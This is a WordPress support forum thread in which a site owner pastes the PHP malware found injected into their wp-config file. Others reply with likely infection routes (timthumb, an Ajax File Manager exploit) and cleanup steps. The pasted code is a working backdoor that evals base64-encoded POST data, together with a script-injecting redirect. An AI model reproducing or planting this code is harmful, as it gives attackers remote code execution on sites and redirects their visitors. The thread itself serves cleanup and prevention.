Support » Fixing WordPress » Site hacked

  • Resolved Gabriel Reguly



    I got this nasty code added in my wp-config file.

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    That is removed now, but I wonder how I got infected in order to prevent from it happening again.

    There is a thread here:


Viewing 6 replies - 1 through 6 (of 6 total)
  • Hey,
    All of my sites got hacked too.

    This code was found in some PHP files. Also, there were some files in root of each directory which begin tmp_ then random numbers like tmp_6576768676.php

    Also, check all your .htaccess but make sure you scroll down and across as they modify .htaccess but the code is not straight after existing code.

    I just spent 2 hours sorting out about 50 directories. I hope all is clear now.

    my best guess is that your theme is using timthumb. You have to update it, by saving it from their official website, here
    and then find it in your wordpress theme and replace it.

    And don’t forget to read

    Timthumb.php would be first to upgrade.

    If your web host provides server logs, you may wish to search if there are FTP/SSH logins by other IPs than yor own (meaning : leaked credentials).

    Etcetera… Sadly, it’s a vast question. The best usually is to do a clean reinstall (only reupping a fresh virgin theme, the double-checked uploads folder, redownloading the plugins from, restoring a database backup) and change ALL your passwords (web host account, FTP, SSH, emails including the “lost password” possible question).

    Thanks for the answers.

    This hack also impacted non WP sites (like ZenPhoto) and was executed against an exploit in the Ajax File Manager included in TinyMCE by some CMS systems.

    One can read more details info here:

    That answer was provided by an expert from WP Questions:

    Moderator Ipstenu (Mika Epstein)


    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Those are two different hacks, as it happens, but yeah, watch out for that too :/

    Thanks Ipstenu!

    I had no timthumb installed, it was the Ajax File Manager that was on another site that was exploited and then infected my WordPress install too.

    (Both sites are in a shared server with several accounts/sites)


Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Site hacked’ is closed to new replies.